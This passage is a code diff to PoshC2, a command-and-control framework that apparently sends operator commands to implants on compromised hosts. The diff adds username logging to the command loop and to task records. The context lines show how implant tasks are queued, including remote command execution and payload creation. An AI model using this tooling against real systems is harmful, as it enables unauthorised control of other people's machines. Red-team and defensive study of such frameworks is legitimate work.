     elif (command.lower() == "history") or command.lower() == "history ":
-      startup(get_history())
+      startup(user, get_history())
 
     elif "reversedns" in command.lower():
       params = re.compile("reversedns ", re.IGNORECASE)
       params = params.sub("", command)
-      new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, randomuri)
+      new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
 
     elif "createdaisypayload" in command.lower():
       createdaisypayload()
@@ -1171,11 +1176,11 @@ def runcommand(command, randomuri):
 
     else:
       if command:
-        new_task(command, randomuri)
+        new_task(command, user, randomuri)
       return
     return
 
-def commandloop(implant_id):
+def commandloop(implant_id, user):
   while(True):
     try:
       implant_id_orig = implant_id
@@ -1206,7 +1211,7 @@ def commandloop(implant_id):
       # if "all" run through all implants get_implants()
       if implant_id.lower() == "all":
         if command == "back":
-          startup()
+          startup(user)
         implant_split = get_implants()
         if implant_split:
           for implant_id in implant_split:
@@ -1232,7 +1237,7 @@ def commandloop(implant_id):
         runcommand(command, implant_id)
 
       # then run back around
-      commandloop(implant_id_orig)
+      commandloop(implant_id_orig, user) #is this required for a while loop? looks like it would lead to a stackoverflow anyway?
 
     except Exception as e:
       print (Colours.RED)
@@ -1242,9 +1247,15 @@ def commandloop(implant_id):
       #print "Error: %s" % e
       # remove the following comment when publishing to live
       time.sleep(1)
-      startup()
+      startup(user, user)
 
 if __name__ == '__main__':
   original_sigint = signal.getsignal(signal.SIGINT)
   signal.signal(signal.SIGINT, catch_exit)
-  startup()
+  parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2')
+  parser.add_argument('-u', '--user', help='the user for this session')
+  args = parser.parse_args()
+  user = args.user
+  if LogUsers is True and user is None:
+    user = raw_input("Enter your username: ") 
+  startup(user)

Tasks.py

@@ -15,6 +15,7 @@ def newTask(path):
       if RandomURI in path and tasks:
         for a in tasks:
           command = a[2]
+          user = a[3]
           user_command = command
           hostinfo = DB.get_hostinfo(RandomURI)
           now = datetime.datetime.now()
@@ -48,7 +49,7 @@ def newTask(path):
             except Exception as e:
               print "Cannot find module, loadmodule is case sensitive!"
               print e
-          taskId = DB.insert_task(RandomURI, user_command, None)
+          taskId = DB.insert_task(RandomURI, user_command, user)
           if len(str(taskId)) > 5:
             raise ValueError('Task ID is greater than 5 characters which is not supported.')
           taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
@@ -58,8 +59,6 @@ def newTask(path):
           else:
             commands += command
           DB.del_newtasks(str(a[0]))
-          
-
         if commands is not None:
           multicmd = "multicmd%s" % commands
         try: